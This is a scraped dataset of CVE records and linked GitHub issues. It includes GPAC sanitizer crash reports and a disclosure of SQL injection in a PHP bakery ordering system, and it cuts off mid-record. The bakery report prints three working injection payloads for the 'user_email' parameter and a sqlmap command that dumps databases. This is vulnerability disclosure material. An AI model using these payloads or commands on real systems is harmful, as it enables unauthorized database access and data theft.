[MPEG-2 TS] TS Packet 147 is scrambled - not supported
[MPEG-2 TS] TS Packet 148 is scrambled - not supported
[MPEG-2 TS] TS Packet 149 does not start with sync marker
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 151 does not start with sync marker
[MPEG-2 TS] TS Packet 152 is scrambled - not supported
[MPEG-2 TS] TS Packet 153 is scrambled - not supported
[MPEG-2 TS] TS Packet 154 is scrambled - not supported
[MPEG-2 TS] TS Packet 155 does not start with sync marker
[MPEG-2 TS] TS Packet 156 does not start with sync marker
[MPEG-2 TS] TS Packet 157 does not start with sync marker
[MPEG-2 TS] TS Packet 158 is scrambled - not supported
[MPEG-2 TS] TS Packet 159 is scrambled - not supported
[MPEG-2 TS] TS Packet 160 is scrambled - not supported
[MPEG-2 TS] TS Packet 161 has error (PID could be 5120)
[MPEG-2 TS] TS Packet 162 does not start with sync marker
[MPEG-2 TS] TS Packet 163 does not start with sync marker
[MPEG-2 TS] TS Packet 164 does not start with sync marker
[MPEG-2 TS] TS Packet 165 does not start with sync marker
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 167 does not start with sync marker
[MPEG-2 TS] TS Packet 168 is scrambled - not supported
[MPEG-2 TS] TS Packet 169 is scrambled - not supported
[MPEG-2 TS] TS Packet 170 does not start with sync marker
[MPEG-2 TS] TS Packet 171 does not start with sync marker
[MPEG-2 TS] TS Packet 172 is scrambled - not supported
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 174 does not start with sync marker
[MPEG-2 TS] TS Packet 175 does not start with sync marker
[MPEG-2 TS] TS Packet 176 does not start with sync marker
[MPEG-2 TS] TS Packet 177 does not start with sync marker
[MPEG-2 TS] TS Packet 178 does not start with sync marker
[MPEG-2 TS] TS Packet 179 does not start with sync marker
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 181 does not start with sync marker
[MPEG-2 TS] TS Packet 182 is scrambled - not supported
[MPEG-2 TS] TS Packet 183 is scrambled - not supported
[MPEG-2 TS] TS Packet 184 is scrambled - not supported
[MPEG-2 TS] TS Packet 185 is scrambled - not supported
[MPEG-2 TS] TS Packet 186 is scrambled - not supported
[MPEG-2 TS] TS Packet 187 is scrambled - not supported
[MPEG-2 TS] TS Packet 189 does not start with sync marker
[MPEG-2 TS] TS Packet 190 does not start with sync marker
[MPEG-2 TS] TS Packet 191 is scrambled - not supported
[MPEG-2 TS] TS Packet 192 is scrambled - not supported
[MPEG-2 TS] TS Packet 193 is scrambled - not supported
[MPEG-2 TS] TS Packet 194 does not start with sync marker
[MPEG-2 TS] TS Packet 195 does not start with sync marker
[MPEG-2 TS] TS Packet 196 does not start with sync marker
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 3 is scrambled - not supported
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 5 is scrambled - not supported
[MPEG-2 TS] TS Packet 6 is scrambled - not supported
[MPEG-2 TS] TS Packet 7 is scrambled - not supported
[MPEG-2 TS] TS Packet 8 is scrambled - not supported
[MPEG-2 TS] TS Packet 9 is scrambled - not supported
[MPEG-2 TS] TS Packet 10 is scrambled - not supported
[MPEG-2 TS] TS Packet 11 is scrambled - not supported
[MPEG-2 TS] TS Packet 12 is scrambled - not supported
[MPEG-2 TS] TS Packet 13 is scrambled - not supported
[MPEG-2 TS] TS Packet 14 is scrambled - not supported
[MPEG-2 TS] TS Packet 15 is scrambled - not supported
[MPEG-2 TS] TS Packet 16 is scrambled - not supported
[MPEG-2 TS] TS Packet 17 is scrambled - not supported
[MPEG-2 TS] TS Packet 18 is scrambled - not supported
[MPEG-2 TS] TS Packet 19 is scrambled - not supported
[MPEG-2 TS] TS Packet 20 is scrambled - not supported
[MPEG-2 TS] TS Packet 21 is scrambled - not supported
[MPEG-2 TS] TS Packet 22 is scrambled - not supported
[MPEG-2 TS] TS Packet 23 is scrambled - not supported
[MPEG-2 TS] TS Packet 24 does not start with sync marker
[MPEG-2 TS] TS Packet 25 AF size is 71 when it must be 183 for AF type 2
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] PID 18 AF Location descriptor found - URL TR▒
[MPEG-2 TS] PID 18: Bad Adaptation Descriptor found (tag 0) size is 0 but only 1 bytes available
filters/dmx_m2ts.c:1215:40: runtime error: member access within null pointer of type 'struct GF_M2TS_ES'
```
## poc
[poc.zip](https://github.com/user-attachments/files/15801157/poc.zip)
| Null pointer deference in filters/dmx_m2ts.c:1215 | https://api.github.com/repos/gpac/gpac/issues/2873/comments | 5 | 2024-06-12T08:32:57Z | 2024-09-27T11:43:26Z | https://github.com/gpac/gpac/issues/2873 | 2,348,158,622 | 2,873 | 6,087 |
CVE-2024-6064 | 2024-06-17T21:15:51.727 | A vulnerability was found in GPAC 2.5-DEV-rev228-g11067ea92-master. It has been declared as problematic. This vulnerability affects the function xmt_node_end of the file src/scene_manager/loader_xmt.c of the component MP4Box. The manipulation leads to use after free. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The name of the patch is f4b3e4d2f91bc1749e7a924a8ab171af03a355a8/c1b9c794bad8f262c56f3cf690567980d96662f5. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-268792. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/gpac/gpac/commit/c1b9c794bad8f262c56f3cf690567980d96662f5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2874"
},
{
"source": "cna@vuldb.com",
"tags": [
"Broken Link"
],
"url": "https://github.com/user-attachments/files/15801189/poc.zip"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268792"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268792"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.356316"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/gpac/gpac/commit/c1b9c794bad8f262c56f3cf690567980d96662f5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2874"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/user-attachments/files/15801189/poc.zip"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268792"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268792"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.356316"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.5-dev-rev288-g11067ea92-master:*:*:*:*:*:*:*",
"matchCriteriaId": "8CB1A488-697C-4770-B217-33A7F8403E77",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/gpac/gpac/issues/2874 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | ## version
```shell
./MP4Box -version
MP4Box - GPAC version 2.5-DEV-rev228-g11067ea92-master
(c) 2000-2024 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
## reproduce
Complie and run
```
./configure --enable-sanitizer
make
./MP4Box -info poc4
```
Information
```shell
XMT: MPEG-4 (XMT) Scene Parsing
[XMT Parsing] Warning: descriptor InitialObjectDescriptor defined outside scene scope - skipping (line 10)
=================================================================
==18912==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000032052 at pc 0x7f54fc2647ed bp 0x7ffce79c0f30 sp 0x7ffce79c0f20
READ of size 2 at 0x607000032052 thread T0
#0 0x7f54fc2647ec in xmt_resolve_od_links scene_manager/loader_xmt.c:531
#1 0x7f54fc2666f0 in load_xmt_run scene_manager/loader_xmt.c:3148
#2 0x7f54fc93db85 in ctxload_process filters/load_bt_xmt.c:522
#3 0x7f54fc67ed9d in gf_filter_process_task filter_core/filter.c:3164
#4 0x7f54fc64a599 in gf_fs_thread_proc filter_core/filter_session.c:2145
#5 0x7f54fc64e903 in gf_fs_run filter_core/filter_session.c:2452
#6 0x7f54fc0cc145 in gf_media_import media_tools/media_import.c:1239
#7 0x5647e6b54da4 in convert_file_info /home/ubuntu/gpac_testt/gpac/applications/mp4box/fileimport.c:130
#8 0x5647e6b2212d in mp4box_main /home/ubuntu/gpac_testt/gpac/applications/mp4box/mp4box.c:6398
#9 0x7f54f989fc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#10 0x5647e6b01579 in _start (/home/ubuntu/gpac_testt/gpac/bin/gcc/MP4Box+0x87579)
0x607000032052 is located 2 bytes inside of 80-byte region [0x607000032050,0x6070000320a0)
freed by thread T0 here:
#0 0x7f54fe7b17a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x7f54fbfbab49 in gf_odf_del_iod odf/odf_code.c:442
#2 0x7f54fb94c1ff in xml_sax_node_end utils/xml_parser.c:265
#3 0x7f54fb94f965 in xml_sax_parse utils/xml_parser.c:867
#4 0x7f54fb951cce in gf_xml_sax_parse_intern utils/xml_parser.c:1104
#5 0x7f54fb952507 in gf_xml_sax_parse utils/xml_parser.c:1132
#6 0x7f54fb952818 in xml_sax_read_file utils/xml_parser.c:1219
#7 0x7f54fb9539aa in gf_xml_sax_parse_file utils/xml_parser.c:1331
#8 0x7f54fc2666ba in load_xmt_run scene_manager/loader_xmt.c:3144
#9 0x7f54fc93db85 in ctxload_process filters/load_bt_xmt.c:522
#10 0x7f54fc67ed9d in gf_filter_process_task filter_core/filter.c:3164
#11 0x7f54fc64a599 in gf_fs_thread_proc filter_core/filter_session.c:2145
#12 0x7f54fc64e903 in gf_fs_run filter_core/filter_session.c:2452
#13 0x7f54fc0cc145 in gf_media_import media_tools/media_import.c:1239
#14 0x5647e6b54da4 in convert_file_info /home/ubuntu/gpac_testt/gpac/applications/mp4box/fileimport.c:130
#15 0x5647e6b2212d in mp4box_main /home/ubuntu/gpac_testt/gpac/applications/mp4box/mp4box.c:6398
#16 0x7f54f989fc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
previously allocated by thread T0 here:
#0 0x7f54fe7b1b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
#1 0x7f54fbfba932 in gf_odf_new_iod odf/odf_code.c:415
#2 0x7f54fbfc3fe3 in gf_odf_desc_new odf/odf_codec.c:244
#3 0x7f54fc278e6f in xmt_parse_descriptor scene_manager/loader_xmt.c:1951
#4 0x7f54fc27bf5d in xmt_node_start scene_manager/loader_xmt.c:2578
#5 0x7f54fb94cd55 in xml_sax_node_start utils/xml_parser.c:308
#6 0x7f54fb94fe5d in xml_sax_parse_attribute utils/xml_parser.c:397
#7 0x7f54fb94fe5d in xml_sax_parse utils/xml_parser.c:940
#8 0x7f54fb951cce in gf_xml_sax_parse_intern utils/xml_parser.c:1104
#9 0x7f54fb952507 in gf_xml_sax_parse utils/xml_parser.c:1132
#10 0x7f54fb952818 in xml_sax_read_file utils/xml_parser.c:1219
#11 0x7f54fb9539aa in gf_xml_sax_parse_file utils/xml_parser.c:1331
#12 0x7f54fc2666ba in load_xmt_run scene_manager/loader_xmt.c:3144
#13 0x7f54fc93db85 in ctxload_process filters/load_bt_xmt.c:522
#14 0x7f54fc67ed9d in gf_filter_process_task filter_core/filter.c:3164
#15 0x7f54fc64a599 in gf_fs_thread_proc filter_core/filter_session.c:2145
#16 0x7f54fc64e903 in gf_fs_run filter_core/filter_session.c:2452
#17 0x7f54fc0cc145 in gf_media_import media_tools/media_import.c:1239
#18 0x5647e6b54da4 in convert_file_info /home/ubuntu/gpac_testt/gpac/applications/mp4box/fileimport.c:130
#19 0x5647e6b2212d in mp4box_main /home/ubuntu/gpac_testt/gpac/applications/mp4box/mp4box.c:6398
#20 0x7f54f989fc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
SUMMARY: AddressSanitizer: heap-use-after-free scene_manager/loader_xmt.c:531 in xmt_resolve_od_links
Shadow bytes around the buggy address:
0x0c0e7fffe3b0: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 00
0x0c0e7fffe3c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
0x0c0e7fffe3d0: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c0e7fffe3e0: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 00 00
0x0c0e7fffe3f0: 00 00 00 00 00 00 00 00 fa fa fa fa fd fd fd fd
=>0x0c0e7fffe400: fd fd fd fd fd fd fa fa fa fa[fd]fd fd fd fd fd
0x0c0e7fffe410: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00
0x0c0e7fffe420: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 00
0x0c0e7fffe430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fffe440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fffe450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==18912==ABORTING
```
## poc
[poc.zip](https://github.com/user-attachments/files/15801189/poc.zip) | Heap-use-after-free scene_manager/loader_xmt.c:531 in xmt_resolve_od_links | https://api.github.com/repos/gpac/gpac/issues/2874/comments | 2 | 2024-06-12T08:34:24Z | 2024-06-18T07:43:59Z | https://github.com/gpac/gpac/issues/2874 | 2,348,161,533 | 2,874 | 6,088 |
CVE-2024-6065 | 2024-06-17T21:15:52.007 | A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation of the argument user_email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268793 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/ppp-src/CVE/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268793"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268793"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358386"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/ppp-src/CVE/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268793"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268793"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358386"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:janobe:bakery_online_ordering_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BF7A73B7-CA75-4CF3-AE1D-54B35F99D710",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ppp-src/CVE/issues/4 | [
"Exploit"
] | github.com | [
"ppp-src",
"CVE"
] | # Itsourcecode Bakery Online Ordering System Using PHP and MySQL Database 1.0 report/index.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Bakery Online Ordering System Using PHP and MySQL Database
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/bakery-online-ordering-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ polaris0x1
## Vulnerable File
+ index.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2017/04/katerina.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'index.php' file of the 'Bakery Online Ordering System Using PHP and MySQL Database' project. The reason for this issue is that attackers inject malicious code from the parameter "user_email" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of "Bakery Online Ordering System Using PHP and MySQL Database", discovered a critical SQL injection vulnerability in the "index.php" file. This vulnerability stems from insufficient user input validation of the 'user_email' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ error-based
+ time-based blind
## Vulnerability location:
+ 'user_email' parameter
## Payload:
```sql
user_email=111' AND 5949=(SELECT (CASE WHEN (5949=5949) THEN 5949 ELSE (SELECT 3559 UNION SELECT 7396) END))-- -&user_pass=qqqqqqqqqqqqqq&btnLogin=
user_email=111' AND (SELECT 7146 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(7146=7146,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XZJo&user_pass=qqqqqqqqqqqqqq&btnLogin=
user_email=111' AND 1861=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- kQqf&user_pass=qqqqqqqqqqqqqq&btnLogin=
```
```makefile
Parameter: user_email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: user_email=111' AND 5949=(SELECT (CASE WHEN (5949=5949) THEN 5949 ELSE (SELECT 3559 UNION SELECT 7396) END))-- -&user_pass=qqqqqqqqqqqqqq&btnLogin=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: user_email=111' AND (SELECT 7146 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(7146=7146,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XZJo&user_pass=qqqqqqqqqqqqqq&btnLogin=
Type: time-based blind
Title: MySQL > 5.0.12 AND time-based blind (heavy query)
Payload: user_email=111' AND 1861=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- kQqf&user_pass=qqqqqqqqqqqqqq&btnLogin=
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://localhost:8101/index.php" --data="user_email=111&user_pass=qqqqqqqqqqqqqq&btnLogin=" --method=POST --level=5 --risk=3 --batch --dbs --dump
___
```
+ 
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Bakery Online Ordering System Using PHP and MySQL Database 1.0 report/index.php SQL injection | https://api.github.com/repos/ppp-src/CVE/issues/4/comments | 0 | 2024-06-16T23:28:05Z | 2024-06-16T23:28:05Z | https://github.com/ppp-src/CVE/issues/4 | 2,356,047,127 | 4 | 6,089 |
CVE-2024-6084 | 2024-06-18T01:15:20.333 | A vulnerability has been found in itsourcecode Pool of Bethesda Online Reservation System up to 1.0 and classified as critical. Affected by this vulnerability is the function uploadImage of the file /admin/mod_room/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268825 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
